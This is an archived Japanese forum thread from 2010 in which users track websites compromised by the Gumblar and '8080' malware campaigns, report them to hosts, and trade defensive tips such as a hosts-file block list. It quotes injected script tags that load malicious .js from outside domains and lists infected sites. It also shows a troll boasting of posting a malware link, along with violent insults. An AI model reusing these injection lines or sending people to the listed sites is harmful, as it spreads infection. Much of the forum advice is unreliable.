10/08/09 20:58:36
jsのこれ?
/*SOS*/
飛び先はNortonセーフウェブで黒判定。
64:名無しさん@お腹いっぱい。
10/08/09 21:14:48
って、飛び先が真っ黒なのを確認すた。>>63
65:名無しさん@お腹いっぱい。
10/08/09 21:44:46
>>64
× 飛び先が真っ黒なのを確認
○ 飛び先のサイトが真っ黒なのを確認
youhelpnow●ru:8080
66:名無しさん@お腹いっぱい。
10/08/09 21:50:44
ノーガードでこのスレに貼られたサイトよく見てるのにまだ一度もやられたことない
やられるやつって相当アホだろ
67:名無しさん@お腹いっぱい。
10/08/09 22:49:14
>>63
全cssの末尾に何か付いてる
68:名無しさん@お腹いっぱい。
10/08/09 22:56:25
>>67
どもです。
cssにも付くようになったのね。。。
69:名無しさん@お腹いっぱい。
10/08/10 01:08:37
>>67-68
末尾「.txt」にして送付、ひげおじさんからお返事。
> ~.css.txt - Trojan-Downloader.JS.Agent.fnh
>
> New malicious software was found in these files. Detection will be included in the next update. Thank you for your help.
70:名無しさん@お腹いっぱい。
10/08/10 01:23:31
URLリンク(safeweb.norton.com)
これマジ?
71:名無しさん@お腹いっぱい。
10/08/10 01:25:32
[国際110番・20スパム紹介・今月のスパム日記]
URLリンク(www.fuzita.org)
<html><head><script>location = 'URLリンク(xxxxxx)';</script></head></html>
↑こんな一行htmlをUPしてスパムの中継にも使われてる
72:名無しさん@お腹いっぱい。
10/08/10 02:09:24
>>70
\(^o^)/オワタ
73:名無しさん@お腹いっぱい。
10/08/10 02:12:08
>>70
\(^o^)/直リンクw
74:名無しさん@お腹いっぱい。
10/08/10 02:16:41
>>62
Exploit.HTML.HCP.a
75:名無しさん@お腹いっぱい。
10/08/10 10:04:49
>>62
オンラインゲームのパス抜きのもの
ilion.blog47.fc2.com/blog-entry-201.html
www.virustotal.com/jp/analisis/cdff7e34478a48929083674034e97fb773dcf40ccef8e70b6f6a2e56fa34c870-1281401616
>>66
ノーガードとかアホとか関係なくって、ソフトウェアの
脆弱性をふさいでるかどうか
76:名無しさん@お腹いっぱい。
10/08/10 16:18:37
>>61-62 消えたw
77:名無しさん@お腹いっぱい。
10/08/10 19:27:11
注入箇所削除の後告知なしで再開。
この短時間でアプリの穴を修正できるわけがない、と思ったら停止しただけでござる。
2010.08.10 2011年度向け商品開発中のため現在、
商品ページがご覧になれなくなっています。
ご迷惑をおかけしますが何卒ご了承ください。
78:名無しさん@お腹いっぱい。
10/08/10 20:07:37
大量の「禿.js」を装填中w
www●bmisland●net/input/mailmag/detail●asp?MAGID=31&MAGCLS=274&SDFLG=1
79:名無しさん@お腹いっぱい。
10/08/11 05:11:56
URLリンク(2chmatomeluo.web.fc2.com)
80:名無しさん@お腹いっぱい。
10/08/11 09:14:04
>>78と同じやつ
www●dousoukainet●jp/plan●asp
81:名無しさん@お腹いっぱい。
10/08/11 21:18:37
今のところ「禿.js」を防ぐセキュリティソフトは皆無か
82:名無しさん@お腹いっぱい。
10/08/11 22:04:54
また凝りもせず新型を作りやがったのか
本気で作者を頃してやりたいわ
つーか本気で氏ねよ銃殺されろ
作者の国に核落とされて滅んじまえ
83:名無しさん@お腹いっぱい。
10/08/11 23:22:44
>>81
セキュリティソフトは関係ないよ。
現時点での話に限れば、それはIEブラウザ、かつWindows Updateを
しとらん場合に攻撃が成立しうる。
逆に8080やgumblar.xはブラウザの種類は関係ない。
アクセスしてきたブラウザに応じた攻撃コードが生成されるように
なっとる。
84:名無しさん@お腹いっぱい。
10/08/12 01:05:00
>>81
*/yahoo.js*
全部蹴ればええやんw
85:名無しさん@お腹いっぱい。
10/08/12 01:06:35
>>82
ニュースで窃盗事件が流れるたびにそこまで考えてたら疲れないか?
とっくに地球滅びてるよな
86:名無しさん@お腹いっぱい。
10/08/13 14:23:50
311 :('д') ◆yUyb3Tqn92 :2010/08/13(金) 02:29:59 ID:1TXtyzUW0
けいおんのモデルの子も同窓会ネットで顔バレしてるぞ
URLリンク(www.dousoukainet.jp)
だから言わんこっちゃない┐('Д')┌
336 :風の谷の名無しさん@実況は実況板で:2010/08/13(金) 02:37:24 ID:LsxSDH1C0
>>311
これ前にも見たけど
けいおんのモデルになったJKって美人ではあるけどアニメには劣るよな
所詮3次元('A`)
387 :風の谷の名無しさん@実況は実況板で:2010/08/13(金) 02:55:26 ID:z25JrXmm0
>>311
そのページのどこにも写真ないんだけど
411 :('д') ◆yUyb3Tqn92 :2010/08/13(金) 03:09:49 ID:PPZzZ1Px0
('Д')部アッハッハッハはヒャ日波や八はアッハハハyはyヒャヒャヒャhyはyはy早はh!
俺様が貼ったのは最新のウィルスだよ
(<●>Д<●>)踏んだ奴ざまぁあああああああああああああああああああああああああっ!
駆除方法はメール欄参照な:(>w<):
416 :('д') ◆yUyb3Tqn92 :2010/08/13(金) 03:17:09 ID:PPZzZ1Px0
さてウィルス(>>311)も踏ませたことだし
もう寝るお
('д')踏んだ奴は徹夜してリカバリするかLANケーブル外しとくことだな
どちらにせよお前らがウィルス対策の作業している間、俺様はグッスリzZZだお♪
87:名無しさん@お腹いっぱい。
10/08/13 14:53:05
iPhoneが乗っ取られるリスク、「Gumblar攻撃」の併用で具現化する恐れ
URLリンク(www.itmedia.co.jp)
とうとうWinだけの問題じゃなくなってきたな
88:名無しさん@お腹いっぱい。
10/08/13 15:06:17
>>86
だからそういう奴がいるから
結局●とか入れても意味ねーんだよ
なので次からURL貼るときは●抜きを許可する
89:名無しさん@お腹いっぱい。
10/08/13 17:36:26
>>86
これはどういうウイルスですか?
90:名無しさん@お腹いっぱい。
10/08/13 17:41:06
>>86
これ踏んじゃったんだけどJavaScript切っていれば大丈夫?
91:名無しさん@お腹いっぱい。
10/08/13 18:16:38
>>86
これって禿.jsって奴?
Firefox+NoScriptなら踏んでもOK?
92:名無しさん@お腹いっぱい。
10/08/13 19:08:27
>>91
おk
93:名無しさん@お腹いっぱい。
10/08/13 19:30:30
>>89
ネトゲのトロイ。
94:名無しさん@お腹いっぱい。
10/08/13 19:42:34
同窓会ネット aguse、gredどちらも無反応なのだが
95:名無しさん@お腹いっぱい。
10/08/13 20:08:07
gumblarじゃないからじゃね
96:名無しさん@お腹いっぱい。
10/08/13 20:10:01
禿もガンブラーもjs切っておけば問題なし
97:名無しさん@お腹いっぱい。
10/08/13 20:12:14
>>95
ネトゲやってないからよく分からないけど
右上のにID、PASSを入力したらネトゲアカウント取られるってやつ?
98:名無しさん@お腹いっぱい。
10/08/13 20:29:08
というかさ、こんなのに感染する奴って何も設定変えてないIEでインターネットしてる初心者だけ
そんな奴らは絶対IEなんか使っちゃ駄目だろ
別にFirefox厨じゃないけどFirefox+NoScriptでブラウジングしておきゃ感染しないんだから
初心者にはこの組み合わせを薦めるべき
入れるだけでおkなんだから
99:名無しさん@お腹いっぱい。
10/08/13 20:37:55
それは言える
>>2よりも>>4こっちが最優先
100:名無しさん@お腹いっぱい。
10/08/13 20:38:41
>>98
2行で済むことをそんな必死に書く低脳が言っても説得力0なんだぜ
101:名無しさん@お腹いっぱい。
10/08/13 20:41:30
黙れ低脳
102:名無しさん@お腹いっぱい。
10/08/13 20:42:28
そもそもWindowsUpdateしていれば感染しない。
103:名無しさん@お腹いっぱい。
10/08/13 22:25:13
>>98
初心者にそんなもんすすめても
動かなくなったって言ってIEにもどるだけだろ
本人のできる範囲で対策させないと何の意味もない
104:名無しさん@お腹いっぱい。
10/08/13 22:33:48
URLリンク(www.m-sennin.com)
SBMSPAM業者でもgumblar8080判定。
105:名無しさん@お腹いっぱい。
10/08/13 22:53:17
URLリンク(www)<)
106:名無しさん@お腹いっぱい。
10/08/13 23:05:55
あのクソ顔文字まだ捕まってねーのかよ
通報してんのになんでだ!
107:名無しさん@お腹いっぱい。
10/08/13 23:30:14
>>105
ここは鑑定スレじゃない
108:名無しさん@お腹いっぱい。
10/08/13 23:53:16
>>105
そのURLに関しては大丈夫 とだけ書いておく
109:名無しさん@お腹いっぱい。
10/08/14 00:04:11
>>106
器物損壊で被害届け出せば?(笑
110:名無しさん@お腹いっぱい。
10/08/14 01:58:19
>>106
法律に無知な奴は恥ずかしいから発言するなよ
夏厨死ね!
111:コテハン ◆8080adndqg
10/08/14 03:23:55
>>104
古いやつ・・
/AC_RunActiveContent.js
>Last-Modified: Fri, 29 Jan 2010 20:48:14 GMT
112:名無しさん@お腹いっぱい。
10/08/14 09:58:00
あははは調子ぶっこいてるな顔文字
いつまで続くかな
113:名無しさん@お腹いっぱい。
10/08/15 02:40:56
馬鹿だな
何年も前からやってて逮捕されてない有名人なんだから
法律が改正でもされん限り続くだろ
114:名無しさん@お腹いっぱい。
10/08/15 08:17:06
社会情勢の変化ってのはあるよ。
イカタコウィルスもそうだが、今までは手をこまねいていたものを
無理矢理何かにあてはめてタイーホというのはよくある話。
特に、その時点の署長や長官が興味を持つと、強制捜査したり
するようになる。
115:名無しさん@お腹いっぱい。
10/08/15 22:23:27
>>114
お前法律わかってないだろw
無知乙
116:名無しさん@お腹いっぱい。
10/08/15 22:29:36
このスレはミーハーが多いから
ちょっとしたイカタコとか例に出してるとこから見て
なにか面白いニュースがあるとすぐそれを引用したがるんだろうな
リアルで馬鹿な分ネットで知的ぶりたいだけだと思う
117:名無しさん@お腹いっぱい。
10/08/15 22:32:17
おっとあげちまったな
まあ過疎すれだからいいけど
あと「ちょっとした」の部分は抜いて読めよ
118:名無しさん@お腹いっぱい。
10/08/15 22:46:38
さっきURLがあまり晒されなくなったというか以前より少なくなったけど
減ってきてるのか?それともスレ分裂のせいか。
119:コテハン ◆8080adndqg
10/08/15 23:16:58
【陥落サイトのURL悪用厳禁】
■関東学生アメリカンフットボール連盟公式ホームページ
www●kcfa●jp/
※7月21日以前から陥落してるっぽい
■京都大学漫画研究部
kyoto-u-mk●hp●infoseek●co●jp/
※更新履歴の中に紛れ込んでる・・
【改竄】絶賛ループ中w【再改竄】
darkside●higashino●jp/ms●cgi?ShowDiary_file=/lasertank/1281712375&blogid=&t=sketch
※コメント欄
>報告ありがとうございます。
>前回より被害範囲は狭まっています。
>追加対策して、根比べです。
>必ず追い出します。
クリーンインストールしろよwww
120:名無しさん@お腹いっぱい。
10/08/15 23:50:12
>>119
それちょっとアホの子だなあ
根絶させるためにJPCERT/CC経由でやってもらったほうがいいかも
121:名無しさん@お腹いっぱい。
10/08/16 00:04:52
>※更新履歴の中に紛れ込んでる・・
ソースでは末尾なんだろうね。
それより後ろはiswebが勝手に入れる広告なので。
122:名無しさん@お腹いっぱい。
10/08/16 15:07:02
www●ark-web●jp/sandbox/wiki/204●html
叩くとホコリが出てきそうなWeb屋だなw
123:名無しさん@お腹いっぱい。
10/08/16 16:24:52
>>119-120
■7月12日(たぶん改竄記念日)
darkside●higashino●jp/ms.cgi?t=sketch&blogid=&ShowDiary_file=/lasertank/1278935970
コメントにセキュリティソフト云々・・・
■7月13日
darkside●higashino●jp/ms.cgi?t=sketch&blogid=&ShowDiary_file=/lasertank/1279023797
>『何か謎ですね』
>急に報告が来てるので、試しにウイルスバスター2010試用版を入れてみました。
>特におかしなものは検出されていません。
>written by IDK ←管理人
■8月2日(祝!再改竄)
darkside●higashino●jp/ms●cgi?t=sketch&blogid=&ShowDiary_file=/lasertank/1280752626
>『やられた』
>警告は出てないし心当たりはないしで困ってます。
>といいつつ実は心当たりあるので対策してみます。具体的内容については、攻撃者に情報を与えないため伏せておきます。
>written by IDK ←管理人
■8月13日(祝!再々改竄ww)
>>119を参照
■8月14日
Google先生に「このウェブサイトにアクセスするとコンピュータに損害を与える可能性があります。」の称号を授与されました
www.google.com/safebrowsing/diagnostic?site=darkside●higashino●jp&hl=ja
笑いすぎて腹痛えwwwwww
124:名無しさん@お腹いっぱい。
10/08/16 23:15:26
トレンドマイクロオンラインスキャンをしたらJaneStyleのdatが2つMal_Gumblarに感染とのこと
削除をしたらインターネットの方は軽快になったもののこれって見つけて削除をすれば問題のないウィルスですか?
125:名無しさん@お腹いっぱい。
10/08/18 11:57:58
そうね
126:名無しさん@お腹いっぱい。
10/08/19 01:03:06
>>124
専ブラなら誤検出なだけだろ
127:名無しさん@お腹いっぱい。
10/08/19 10:03:06
>>124が快適になったって言ってるんだからいいじゃん!!
128:名無しさん@お腹いっぱい。
10/08/19 23:43:20
それにしても「jsきってりゃおkおk」って、
街歩くためにいちいちボディガードで周り固めればいいじゃんって言ってるようなもんだよな
java使うページも昨今増えてるのに「javaきればおk」って不便さを顧みない思考停止寸前モノとしか……
129:名無しさん@お腹いっぱい。
10/08/20 00:11:21
なんか最後の行で話が変わってるけどJava使ってるサイトそんなに増えてる?
130:コテハン ◆8080adndqg
10/08/20 00:15:44
【陥落サイトのURL悪用厳禁】
calliy●com/
関西大学なぎなた部
s1●shard●jp/kunagi
Gumblarっぽいのが混ざってるような気が・・
--本日の目玉商品--
【このサイトはコンピュータに損害を与える可能性があります。】
企業コンサルティング、ラジオ番組制作、ECサイト運営、WEB制作の株式会社エントランス。
www●en-trance●co●jp/
↓
■セーフ ブラウジング 診断結果
www.google.com/safebrowsing/diagnostic?site=www●en-trance●co●jp/&hl=ja
>疑わしいサイトとして認識されています。>このウェブサイトにアクセスするとコンピュータに損害を与える可能性があります。
131:名無しさん@お腹いっぱい。
10/08/20 00:18:44
>>129
JAVAとJAVAScriptの違いもわからんバカはスルーしろよw
132:名無しさん@お腹いっぱい。
10/08/20 00:39:23
猛暑で頭沸騰してるのが居るなw
contents-edu●mind●meiji●ac●jp
>fucked by U#0h4x0r Blog:www.noahacker.com fuck jps all killer in the war !
※8080系に陥落
133:名無しさん@お腹いっぱい。
10/08/20 18:28:36
今gradの調子おかしくね?
134:名無しさん@お腹いっぱい。
10/08/20 18:29:45
間違えたgredだ
135:名無しさん@お腹いっぱい。
10/08/21 02:25:32
今北産業
>>130の内、残ってる分。
> kunagi
大学にメルポ
> en-trance
AC_RunActiveContent●jsに別のがあったのでWhoisからメルポ
136:夷塚 ◆y0JEaK6O/gDf
10/08/21 15:49:23
>>130
s1●shard●jp/kunagi
→jsunpack.jeek.org/dec/go?report=a812e039d6e8c23954264744097626222a6d00dc
137:コテハン ◆8080adndqg
10/08/21 18:57:10
>>135-136 乙乙
【陥落サイトのURL悪用厳禁】
CODE1(なつかしー)+8080(現行型)+一番下はガンブラコ・・なのか?
www●simpleds●biz/
138:コテハン ◆8080adndqg
10/08/21 19:05:02
>137追記
jsunpack.jeek.org/dec/go?report=bc5e43cdd9bff71b13258346a81d439ac14ae5b8
139:コテハン ◆8080adndqg
10/08/22 22:00:21
【陥落サイトのURL悪用厳禁】
新ガンブラ子なのか?
<8080のコード><!--「32桁の英数字」--><script src=http://~中略~.php ></script>
↓
www●yenisehirliyiz●biz
danraf●by●ru
hiero●expo●ru ←改竄祭開催中(危)
※他にもたくさんある
■検索わーど
".ru/" ".js></script><--" "--><script src=" ".php ></script>"
■日本のサイトも陥落してるっぽい
detail.chiebukuro.yahoo.co.jp/qa/question_detail/q1445102614
あと、コード一行だけってコレかな?
roseplaceseniorassistedliving●com
140:名無しさん@お腹いっぱい。
10/08/23 21:21:23
www●eudora-jp●com
</HTML>
<script type="text/javascript" src="URLリンク(riotassistance)●ru/Template●js"></script>
<!--68a2c5dd53f8db2f85dd899d63a960bb-->
コンテンツはオン・ザ・エッヂ当時のままっぽいが、よくわかんない奴の手に落ちてる?
141:名無しさん@お腹いっぱい。
10/08/24 21:03:57
www●golf●ne●jp/guest/compe/Play_EachDisp●asp?PID=1
142:名無しさん@お腹いっぱい。
10/08/25 00:28:19
いちおう貼っておく
■DLLのロード方法を狙う新たな攻撃手法~マイクロソフトがアドバイザリ公開
URLリンク(www.so-net.ne.jp)
■マイクロソフト セキュリティ アドバイザリ (2269637)
URLリンク(www.microsoft.com)
143:コテハン ◆8080adndqg
10/08/25 18:10:48
【陥落サイトのURL悪用厳禁】
www●baloghlaszlo●hu/
↓
nuttypiano●com/~●js
どっとこむ・・
144:コテハン ◆8080adndqg
10/08/25 20:35:06
【陥落サイトのURL悪用厳禁】
関東学生アメリカンフットボール連盟公式ホームページ
kcfa●jp/ ←再改竄
>Last-Modified: Wed, 25 Aug 2010 03:26:52 GMT
nuttypiano●com/は、まだ検索に引っ掛からん・・
145:名無しさん@お腹いっぱい。
10/08/25 22:33:51
URLリンク(wwwyoutube)●zz●tc/watchvSUUqke6rxWs
Gumblar?
146:名無しさん@お腹いっぱい。
10/08/26 00:38:22
>>145
ここは鑑定スレではありません
147:名無しさん@お腹いっぱい。
10/08/26 00:38:45
>>144
祝!\(^o^)/再改竄
148:名無しさん@お腹いっぱい。
10/08/26 14:45:29
>>144
niftyにつーほー
前回もniftyにつーほーして受領されたんだけどねぇ。。。
149:コテハン ◆8080adndqg
10/08/27 14:32:43
【陥落サイトのURL悪用厳禁】
www16●atpages●jp/akimonomm/businessstory/
www●curry-ousama●co●jp/i/ ※電話用
150:名無しさん@お腹いっぱい。
10/08/27 19:40:36
>>145
仮想PCが重くなった よってGumblar確定
151:コテハン ◆8080adndqg
10/08/27 20:05:47
【陥落サイトのURL悪用厳禁】
「禿.js」装填中のweb屋
・ホームページ開発,受託,請負,Web開発,システム開発【フィールドシステム】
www●fieldsystem●ne●jp/blog/entvw_0000000001●aspx
↓
<meta name="description" CONTENT="フィールドシステムからのお知らせです。<script src=http://www●wangqiao365●com/img/yahoo●js></script>">
www.google.com/safebrowsing/diagnostic?site=www●fieldsystem●ne●jp/&hl=ja
廃業しろよwwww
152:名無しさん@お腹いっぱい。
10/08/27 20:30:14
>>151
同意w
153:名無しさん@お腹いっぱい。
10/08/27 21:23:47
>>151
これはw
154:名無しさん@お腹いっぱい。
10/08/27 23:40:37
今北産(ry
乙乙
>>149
上:@PAGESにつーほー。
下:削除されたみたい。
>>151
So-netにつーほー。
155:名無しさん@お腹いっぱい。
10/08/28 01:49:58
フィールドシステム
\(^o^)/オワタ
156:名無しさん@お腹いっぱい。
10/08/28 18:45:05
顔文字は「ついったー」で暴れとる?
@housoukomachi
@gyudon_sukiya
@meiji_fan
ついったーにつーほーしたら面白い事になるかもしれんw
※日本のザルな法律じゃなくて、アメリカンな法律で裁かれる
157:名無しさん@お腹いっぱい。
10/08/30 09:13:39
hostsファイルにガンブラーの感染源サイトを明記しておけばある程度防げると思うんだがなぁ
0.0.0.0 cc●wzxyq●com
って感じでゴリゴリと
C:\Windows\System32\drivers\etcフォルダ内のhostsファイルね
158:名無しさん@お腹いっぱい。
10/08/30 09:28:27
それとrd.or.tpはrd.or.tlにURLが変わったまま403の模様
159:名無しさん@お腹いっぱい。
10/08/30 09:55:45
0.0.0.0 www●rctank●jp
0.0.0.0 rctank●jp
0.0.0.0 wzxyq●com
0.0.0.0 cc●wzxyq●com
0.0.0.0 googleads●g●doubleclick●net
0.0.0.0 g●doubleclick●net
0.0.0.0 doubleclick●net
0.0.0.0 nuttypiano●com
0.0.0.0 riotassistance●ru
0.0.0.0 roseplaceseniorassistedliving●com
0.0.0.0 jsunpack●jeek●org
0.0.0.0 jeek●org
0.0.0.0 parkperson●ru
0.0.0.0 www●parkperson●ru
0.0.0.0 pantscow●ru
0.0.0.0 www●pantscow●ru
0.0.0.0 60●42●255●33
0.0.0.0 118●21●192●131
0.0.0.0 118●21●197●41
0.0.0.0 218●43●251●37
0.0.0.0 210●190●162●5
0.0.0.0 118●23●168●15
0.0.0.0 122●1●246●94
0.0.0.0 221●184●27●254
0.0.0.0 163●139●130●150
0.0.0.0 163●139●124●135
0.0.0.0 203●152●213●250
0.0.0.0 www14●atpages●jp
0.0.0.0 www●wangqiao365●com
0.0.0.0 wangqiao365●com
こんな感じで書いておけば気休めにはなるかもしれない
160:名無しさん@お腹いっぱい。
10/08/30 10:19:30
過去レスにもあったけどhosts明記してる人は結構いるよ
161:名無しさん@お腹いっぱい。
10/08/30 11:20:43
取扱注意
sumori●jp
162:名無しさん@お腹いっぱい。
10/08/30 11:25:29
<script type="text/javascript" src="URLリンク(youngarea)●ru/Network●js"></script>
これだな
163:名無しさん@お腹いっぱい。
10/08/30 12:57:49
>>161
電凸完了
164:163
10/08/30 14:30:28
あんの~~スモリさん?
index.phpのコードは光速で消えたけど
jsの中に残ってるコードはどうすんのよ?(苦笑)
電話だけではわからないみたいだから
問い合わせフォームから再凸
■IPA(情報処理推進機構)
URLリンク(www.ipa.go.jp)
▼(3)ウェブサイト改ざんの被害発生時の対処
URLリンク(www.ipa.go.jp)
■インシデント報告の届出(JPCERT/CC)
URLリンク(www.jpcert.or.jp)
■so-netセキュリティ通信
URLリンク(www.so-net.ne.jp)
▼「ガンブラー」「サイト改ざん」めぐる基本のQ&A
URLリンク(www.so-net.ne.jp)
▼サイト改ざん猛威:感染パソコンの修復は「OSの再インストール」が近道
URLリンク(www.so-net.ne.jp)
これだけ添付しておけばきっとわかってくれr(ry
165:名無しさん@お腹いっぱい。
10/08/30 14:53:11
>>164
WHOISからめるぽ。
さくらにもつーほーすたお。
166:名無しさん@お腹いっぱい。
10/08/30 18:34:37
spam ; 終わらないサイトの改竄
URLリンク(slashdot.jp)
岡山はんこ広場
www.hanko-okayama●jp
→nuttypiano●com/E-mail.js (いつもの)
こんなページが設置されていたり。
www.hanko-okayama●jp/where34.html
→www.drugsad●com (薬屋さん)
→nakulan.co●in/_vti_script/h-clearance.php (いつもの)
167:名無しさん@お腹いっぱい。
10/08/30 19:24:05
>>166
~34.htmlにGumblarっぽいのが寄生してるなw
168:名無しさん@お腹いっぱい。
10/08/31 11:42:26 BE:2340096285-2BP(0)
ウイルススキャンしたら80個物の感染jsファイルがあってワロス
幸い削除できたから一安心出来ない
169:名無しさん@お腹いっぱい。
10/08/31 11:48:13
ヒント:誤検出
170:名無しさん@お腹いっぱい。
10/08/31 12:00:58 BE:1872076984-2BP(0)
だとええなぁ avastだからなぁ
171:名無しさん@お腹いっぱい。
10/08/31 16:00:26
取扱注意
www●keiolax●com
172:名無しさん@お腹いっぱい。
10/08/31 17:44:48
92.243.84.187.addr.datapoint.ru Mozilla/4.0 (compatible; MSIE 6.0; Windows 98; Win 9x 4.90)
h http://うちのサイト/plugins/editors/tinymce/jscripts/tiny_mce/plugins/tinybrowser/tinybrowser.php?type=file&folder=
↑が存在しないディレクトリに直接やって来ていた
tiny_mce改竄系か
173:名無しさん@お腹いっぱい。
10/08/31 17:46:03
URLリンク(www.roque.net)
やっぱそうだった
174:名無しさん@お腹いっぱい。
10/09/01 05:52:38
直リンすんなカス 死ねや
175:名無しさん@お腹いっぱい。
10/09/01 18:49:15
>>151
無害とは言え、今現在もコードが残ったままとは・・
フィールドシステム完璧にオワタww
176:名無しさん@お腹いっぱい。
10/09/03 11:00:30
取扱注意
file●asobube●com/sansyoku/index●html
マグロと一緒にウィルスも食わされるとは…!
177:夷塚 ◆y0JEaK6O/gDf
10/09/03 14:19:11
>>176
だれうまw
メル凸済み
178:名無しさん@お腹いっぱい。
10/09/03 16:15:54
rockmansbible○hp○infoseek○co○jp
Trojan:JS/Redirector.DC検出
179:名無しさん@お腹いっぱい。
10/09/03 18:57:04
>>176 つまんね お前はサーモンでも食ってろボケ
180:名無しさん@お腹いっぱい。
10/09/03 19:01:14
>>178 </HTML>の下だな 暗号化されてる部分のC=M("~");を復号化すると
/google●com/mininova●org/youdao●com●phpになるな
181:名無しさん@お腹いっぱい。
10/09/03 19:50:21
>>177
URLリンク(sucuri.net)
注:玄人向け
参照
MW:JS:151
MW:JS:152
182:名無しさん@お腹いっぱい。
10/09/03 20:51:39
>>178
"Trojan:JS/Redirector.DC"という事はMSEか やばいね
183:名無しさん@お腹いっぱい。
10/09/03 21:16:30
え?
184:名無しさん@お腹いっぱい。
10/09/04 00:52:16
>>2,3の対策しててもWebシールド機能無しのセキュリティソフトじゃ防げないとでも言いたいのでは
185:名無しさん@お腹いっぱい。
10/09/04 19:10:17
>>180 だから何
186:名無しさん@お腹いっぱい。
10/09/04 22:14:14
お前の小さな脳味噌で考えれば
187:名無しさん@お腹いっぱい。
10/09/05 00:21:35
system doctor 2006をダウンロードしたいのですが、まだ生き残ってますかね?
どなたかplz
188:名無しさん@お腹いっぱい。
10/09/05 00:44:25
>>187
URLリンク(web.archive.org)
自己責任でな 元々サイトが死んでるから実行出来るかはシラネ
189:名無しさん@お腹いっぱい。
10/09/05 16:11:50
>>188 リンク切れでした・・・
偽アンチウイルスソフトでダウンロードできるとこって何かないですか?
190:名無しさん@お腹いっぱい。
10/09/05 16:20:02
URLリンク(web.archive.org)
これでやってみたらどうだ
191:名無しさん@お腹いっぱい。
10/09/05 16:40:14
>>190 できた。ありがとう。
これでアンチウイルスの性能評価できる。
192:名無しさん@お腹いっぱい。
10/09/05 23:27:13
最近のガンブラーって感染すると偽物セキュリティー入れてくるだけ?
それとも情報盗まれる?
193:名無しさん@お腹いっぱい。
10/09/05 23:37:45
>>192
試してみるのオヌヌメ
194:名無しさん@お腹いっぱい。
10/09/06 00:04:39
>>193
試せたらここで聞いてないわw
195:名無しさん@お腹いっぱい。
10/09/06 10:46:28
ホントに最近不毛な返しが多いな……
「PCすてれば」とか「ためせば」とか「javaきればおkおk」とか
相手にガブガブする奴も多いし
196:コテハン ◆8080adndqg
10/09/06 14:08:00
【陥落サイトのURL悪用厳禁】
ueno-syoten●com/
>>195
荒れるのは「仕様」なので我慢して下さい
197:名無しさん@お腹いっぱい。
10/09/06 22:38:03
www5●ocn●ne●jp/~kobadent/
www16●ocn●ne●jp/~moyogi/
www31●ocn●ne●jp/~jbc/
www4●ocn●ne●jp/~minorisk/
www8●ocn●ne●jp/~iyashiro/
www18●ocn●ne●jp/~serec/ <Gumblar.X>
198:名無しさん@お腹いっぱい。
10/09/07 20:45:08
>>192
感染後の流れはここの「第3段階」のところ
今でも変わってないと思う
blog.trendmicro.co.jp/archives/3340
冗談ではなく、何が行なわれるかは実際に感染しないと分からん
PCが乗っ取られるので、攻撃者のやりたい放題状態になる
199:名無しさん@お腹いっぱい。
10/09/07 22:04:08
>>198
なるほど、情報サンクス
200:コテハン ◆8080adndqg
10/09/07 22:50:09
【陥落サイトのURL悪用厳禁】
8080(旧型)
www●kireibast●sakura●ne●jp/~
↓
URLリンク(search.yahoo.co.jp)●kireibast●sakura●ne●jp&aq=-1&oq=&ei=UTF-8&fr=sfp_as&x=wrt
>約2,310件
たぶんGumblar.x
sugimotokairo●net/index●h
その他(下段は改竄祭り絶賛開催中)
www6●atpages●jp/ryumazin
istanbulyelken●com/iyk/templates_c/index1●html
201:名無しさん@お腹いっぱい。
10/09/09 08:10:55
bigkaden2010net.shop-pro●jp/
202:コテハン ◆8080adndqg
10/09/09 17:16:41
【陥落サイトのURL悪用厳禁】
www●mspinjapan●com/
203:コテハン ◆8080adndqg
10/09/09 17:49:14
【陥落サイトのURL悪用厳禁】
www●foresto-ne●com/
204:名無しさん@お腹いっぱい。
10/09/09 18:01:17
Adobe Reader、Acrobatに新たなゼロデイ攻撃
URLリンク(internet.watch.impress.co.jp)
205:('д') ◆yUyb3Tqn92
10/09/09 20:12:33
悪用厳禁とか書いてるやつマジわりー野郎だなニヒヒヒ
('д')いい加減俺様みたいなのが悪用するのわかって貼ってるだろ
206:名無しさん@お腹いっぱい。
10/09/09 20:25:44
お前が悪用してもたかがしれてるわ
207:('д') ◆yUyb3Tqn92
10/09/09 20:50:23
と、俺様の煽りに早速馬鹿が釣れたわい
こういう反応を高みの見物するの好き('д')v イェィ
208:名無しさん@お腹いっぱい。
10/09/09 20:53:12
何やってんだ?
早く悪用してみろよ糞ガキ
209:名無しさん@お腹いっぱい。
10/09/09 21:03:41
高みの見物
意 味:物事の成り行きを、第三者として傍観すること。
210:コテハン ◆8080adndqg
10/09/09 21:38:57
>>205
33323335333433353333333733323335333333393334333633323335333433313333333533323335
33343335333333373332333533333339333433313332333533333338333333343332333533343335
33333339333233353333333933343331333233353333333933343333333233353334333533333335
33323335333433313334333533323335333433323333333333323335333433353333333833323335
33333338333333303332333533333338333333353332333533343335333333343332333533343332
33333339333233353333333933333339
211:名無しさん@お腹いっぱい。
10/09/09 22:21:32
取扱注意w
ruhuraro●blog57●fc2●com/
212:名無しさん@お腹いっぱい。
10/09/09 22:42:21
fc2のブログもターゲットになったか
213:名無しさん@お腹いっぱい。
10/09/09 22:44:05
33333333333333353333333533363331333333323336333233333333333333363333333333333335
33333335333633313333333733333339333333373333333733333333333333353333333633333331
33333335333333333333333533333337333333333333333433333333333333343333333433333337
33333337333333353333333333333335333333373333333233333335333333333333333333333337
33333333333333353333333533333339333333373333333533333335333333363333333333333335
33333333333333363333333633333331333333343333333233333333333333353333333733333331
3333333333333332333333363333333930643061
214:名無しさん@お腹いっぱい。
10/09/09 23:17:01
>>212
馬鹿?
215:名無しさん@お腹いっぱい。
10/09/10 00:51:01
んー8080系はドメインがだいぶ死んじゃってて検体が入手できん
> 16287 個のドメインを感染させています
www.google.com/safebrowsing/diagnostic?site=nuttypiano.com&hl=ja
だいぶ大きいけど、去年の初代Gumblar(GENO)はピーク時6万
googleonlinesecurity.blogspot.com/2009/06/top-10-malware-sites.html
216:名無しさん@お腹いっぱい。
10/09/10 00:59:06
◆yUyb3Tqn92 これからもどんどん初心者釣ってくれ 初心者が2chに増えすぎていい加減ウザイと思ってきた頃だ
217:名無しさん@お腹いっぱい。
10/09/10 13:26:37
自分で自分を応援するのか
胸が熱くなるな…
218:名無しさん@お腹いっぱい。
10/09/10 16:17:26
>>217
マジキチだから仕方がないw
219: ◆xs.m./NkkNFp
10/09/10 20:49:12
古参(笑)ばかりの2chもつまらんだろうに
220:('д') ◆yUyb3Tqn92
10/09/11 00:29:46
おいおい俺様の話題で持ちきりだな
でも俺様にムカついちゃった奴の自演なのだろう
他の書き込みを自演と決め付けている被害妄想をしてるのがなによりの証拠だぜ
自演大好きな奴にありがちな被害妄想乙(>w<)お見通し!
